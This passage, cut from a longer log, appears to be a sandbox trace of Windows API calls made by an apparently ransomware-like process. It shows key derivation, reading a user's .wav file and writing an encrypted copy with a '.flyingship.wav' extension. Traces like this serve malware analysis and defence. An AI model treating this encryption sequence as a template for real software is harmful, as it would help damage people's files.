hHeap=0x8a0000) returned 1 [0186.548] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0186.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0186.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0186.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0186.553] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0186.553] CryptDestroyHash (hHash=0x90af58) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0186.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\y3qznbvqkq2ur4uosf8q.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.556] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.556] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0186.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\y3qznbvqkq2ur4uosf8q.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0186.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0186.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0186.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.560] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0186.560] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7b69, lpOverlapped=0x0) returned 1 [0186.563] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0186.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7b69) returned 0xbea018 [0186.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.565] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0186.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 